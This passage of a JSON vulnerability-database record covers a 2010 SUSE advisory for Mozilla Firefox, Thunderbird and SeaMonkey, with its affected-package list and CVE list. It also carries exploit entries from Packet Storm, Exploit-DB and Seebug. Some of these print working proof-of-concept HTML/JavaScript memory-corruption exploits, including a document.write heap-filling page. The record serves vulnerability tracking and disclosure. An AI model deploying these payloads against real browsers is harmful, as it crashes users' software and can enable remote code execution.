"arch": "x86_64", "packageFilename": "MozillaThunderbird-3.0.10-0.5.1.x86_64.rpm", "packageName": "MozillaThunderbird", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "libfreebl3-3.12.8-1.2.1.x86_64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-js192-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-js192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "libfreebl3-3.12.8-1.2.1.i586.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-js192-32bit-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-js192-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.6.12-0.7.1", "arch": "i586", "packageFilename": "MozillaFirefox-branding-upstream-3.6.12-0.7.1.i586.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-buildsymbols-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-buildsymbols", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-translations-common-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "i586", "packageFilename": "seamonkey-dom-inspector-2.0.10-0.1.1.i586.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-sysinit-32bit-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-sysinit-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.15-0.2.1.i586.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.10-0.7.1", "arch": "x86_64", "packageFilename": "seamonkey-venkman-2.0.10-0.7.1.x86_64.rpm", "packageName": "seamonkey-venkman", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "s390x", "packageFilename": "mozilla-nss-devel-3.12.8-1.4.1.s390x.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nss-3.12.8-1.2.1.ppc64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.i586.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-translations-32bit-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-translations-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "i586", "packageFilename": "seamonkey-irc-2.0.10-0.7.1.i586.rpm", "packageName": "seamonkey-irc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "ppc", "packageFilename": "MozillaFirefox-translations-other-3.6.12-0.1.1.ppc.rpm", "packageName": "MozillaFirefox-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "ppc", "packageFilename": "MozillaFirefox-3.6.12-0.1.1.ppc.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "mozilla-nss-devel-3.12.8-1.2.1.i586.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "4.8.6-1.1.1", "arch": "i586", "packageFilename": "mozilla-nspr-4.8.6-1.1.1.i586.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner191-translations-common-1.9.1.15-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner191-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "4.8.6-1.1.1", "arch": "i586", "packageFilename": "mozilla-nspr-devel-4.8.6-1.1.1.i586.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nss-3.12.8-1.2.1.ppc64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner192-x86-1.9.2.12-0.6.1.ia64.rpm", "packageName": "mozilla-xulrunner192-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.x86_64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "ia64", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.ia64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "python-xpcom191-1.9.1.15-0.2.1.i586.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-1.9.1.15-0.2.1.i586.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nss-32bit-3.12.8-1.2.1.ppc64.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-32bit-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "ppc", "packageFilename": "libfreebl3-3.12.8-1.1.1.ppc.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-translations-common-1.9.1.15-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner191-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.6.12-0.6.1", "arch": "ppc64", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.ppc64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "mozilla-nss-3.12.8-1.2.1.i586.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.i586.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "ppc", "packageFilename": "MozillaThunderbird-translations-common-3.0.10-0.5.1.ppc.rpm", "packageName": "MozillaThunderbird-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-common-3.6.12-0.1.1.x86_64.rpm", "packageName": "MozillaFirefox-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-translations-other-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "i586", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-translations-other-1.9.1.15-0.2.1.i586.rpm", "packageName": "mozilla-xulrunner191-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-sysinit-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-sysinit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "4.8.6-1.1.1", "arch": "i586", "packageFilename": "mozilla-nspr-devel-4.8.6-1.1.1.i586.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}], "description": "Various Mozilla suite components, including Firefox, were updated to fix various bugs and security issues.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "reporter": "Suse", "published": "2010-11-08T11:27:17", "title": "remote code execution in MozillaFirefox,seamonkey,MozillaThunderbird", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2762", "CVE-2010-2766", "CVE-2010-3131", "CVE-2010-2770", "CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3169", "CVE-2010-3176", "CVE-2010-3174", "CVE-2010-2763", "CVE-2010-3167", "CVE-2010-3180", "CVE-2010-2753", "CVE-2010-3168", "CVE-2010-2764", "CVE-2010-3166", "CVE-2010-2769", "CVE-2010-3179", "CVE-2010-2768", "CVE-2010-2765", "CVE-2010-2767", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3170", "CVE-2010-3183", "CVE-2010-2760"], "modified": "2010-11-08T11:27:17", "id": "SUSE-SA:2010:056", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-11/msg00003.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:14", "references": [], "description": "", "edition": 1, "reporter": "Packet Storm", "published": "2010-10-29T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "title": "Firefox Memory Corruption", "type": "packetstorm", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3765"], "modified": "2010-10-29T00:00:00", "id": "PACKETSTORM:95278", "href": "https://packetstormsecurity.com/files/95278/Firefox-Memory-Corruption.html", "sourceData": "`For those who still do not know .. The proof of concept (that I have \nextracted) for CVE-2010-3765 is the following: \n \n<html><body> \n<script> \n \nfunction G(str){ \nvar cobj=document.createElement(str); \ndocument.body.appendChild(cobj); \ncobj.scrollWidth; \n} \n \nfunction crashme() { \ndocument.write(\"fooFOO\"); \nG(\"a\"); \ndocument.write(\"<a lang></a>a\"); \nG(\"base\"); \ndocument.write(\"barBAR\"); \nG(\"audio\"); \n} \n</script> \n<script>crashme();</script> \n</body> \n</html> \n \nFor more details: \nhttp://extraexploit.blogspot.com/2010/10/cve-2010-3765-proof-of-concept.html \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/95278/firefox-memcorrupt.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-04T00:08:05", "osvdbidlist": ["68850"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Mozilla Firefox SeaMonkey 3.6.10 and Thunderbird 3.1.4 'document.write' Memory Corruption Vulnerability. CVE-2010-3179. Remote exploit for linux platform", "reporter": "Alexander Miller", "published": "2010-10-19T00:00:00", "type": "exploitdb", "title": "Mozilla Firefox SeaMonkey <= 3.6.10 and Thunderbird <= 3.1.4 - 'document.write' Memory Corruption Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3179"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2010-10-19T00:00:00", "id": "EDB-ID:34881", "href": "https://www.exploit-db.com/exploits/34881/", "sourceData": "source: http://www.securityfocus.com/bid/44247/info\r\n\r\nMozilla Firefox, Thunderbird, and Seamonkey are prone to a memory-corruption vulnerability because they fail to adequately validate user-supplied data.\r\n\r\nSuccessful exploits may allow an attacker to execute arbitrary code in the context of the user running an affected application. Failed exploit attempts will result in a denial-of-service condition.\r\n\r\nThis issue affects versions prior to:\r\n\r\nFirefox 3.6.11\r\nFirefox 3.5.14\r\nThunderbird 3.1.5\r\nThunderbird 3.0.9\r\nSeaMonkey 2.0.9\r\n\r\nNOTE: This issue was previously discussed in 44228 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2010-64/65/66/67/68/69/71/72 Multiple Vulnerabilities) but has been given its own record to better document it. \r\n\r\n<html>\r\n<head>\r\n<script language=\"JavaScript\" type=\"Text/Javascript\">\r\n var eip = unescape(\"%u4141%u4141\");\r\n var string2 = unescape(\"%u0000%u0000\");\r\n var finalstring2 = expand(string2, 49000000);\r\n var finaleip = expand(eip, 21000001);\r\ndocument.write(finalstring2);\r\ndocument.write(finaleip);\r\nfunction expand(string, number) {\r\n var i = Math.ceil(Math.log(number) / Math.LN2),\r\n result = string;\r\n do {\r\n result += result;\r\n } while (0 < --i);\r\n return result.slice(0, string.length * number);\r\n}\r\n</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n<html><body></body></html>\r\n\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34881/"}], "seebug": [{"lastseen": "2017-11-19T18:07:22", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2010-10-29T00:00:00", "type": "seebug", "title": "Firefox Memory Corruption Proof of Concept (Simplified)", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3765"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2010-10-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20209", "id": "SSV:20209", "sourceData": "\n Hi there,\r\n \r\nFor those who still do not know .. The proof of concept (that I have\r\nextracted) for CVE-2010-3765 is the following:\r\n \r\n<html><body>\r\n<script>\r\n \r\n function G(str){\r\n var cobj=document.createElement(str);\r\n document.body.appendChild(cobj);\r\n cobj.scrollWidth;\r\n }\r\n \r\n function crashme() {\r\n document.write("fooFOO");\r\n G("a");\r\n document.write("<a lang></a>a");\r\n G("base");\r\n document.write("barBAR");\r\n G("audio");\r\n }\r\n</script>\r\n<script>crashme();</script>\r\n</body>\r\n</html>\r\n \r\nFor more details:\r\nhttp://extraexploit.blogspot.com/2010/10/cve-2010-3765-proof-of-concept.html\r\n-- \r\nhttp://extraexploit.blogspot.com\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20209", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "status": "poc"}, {"lastseen": "2017-11-19T18:07:38", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "BUGTRAQ ID: 44252\r\nCVE(CAN) ID: CVE-2010-3178\r\n\r\nFirefox\u662f\u4e00\u6b3e\u975e\u5e38\u6d41\u884c\u7684\u5f00\u6e90WEB\u6d4f\u89c8\u5668\u3002\r\n\r\n\u5982\u679c\u7f51\u9875\u6253\u5f00\u4e86\u65b0\u7684\u7a97\u53e3\u5e76\u4f7f\u7528javascript: URL\u6267\u884cmodal\u8c03\u7528\uff0c\u5982alert()\uff0c\u4e14\u4e4b\u540e\u5c06\u7f51\u9875\u5bfc\u822a\u5230\u4e86\u4e0d\u540c\u7684\u57df\uff0c\u5219modal\u8c03\u7528\u8fd4\u56de\u5230\u7a97\u53e3\u7684\u6253\u5f00\u7a0b\u5e8f\u5c31\u53ef\u4ee5\u8bbf\u95ee\u6240\u5bfc\u822a\u5230\u7a97\u53e3\u4e2d\u7684\u5bf9\u8c61\u3002\u8fd9\u8fdd\u53cd\u4e86\u540c\u6e90\u7b56\u7565\uff0c\u5141\u8bb8\u7528\u6237\u7a83\u53d6\u5176\u4ed6\u7f51\u7ad9\u7684\u654f\u611f\u4fe1\u606f\u3002\n\nMozilla Firefox 3.6.x\r\nMozilla Firefox 3.5.x\r\nMozilla Thunderbird 3.1.x\r\nMozilla Thunderbird 3.0.x\r\nMozilla SeaMonkey < 2.0.9\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMozilla\r\n-------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.mozilla.org/\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2010:0782-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2010:0782-01\uff1aCritical: firefox security update\r\n\u94fe\u63a5\uff1ahttps://www.redhat.com/support/errata/RHSA-2010-0782.html", "reporter": "Root", "published": "2010-10-26T00:00:00", "type": "seebug", "title": "Mozilla Firefox Modal\u8c03\u7528\u8de8\u57df\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3178"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2010-10-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20203", "id": "SSV:20203", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "status": "details"}]}
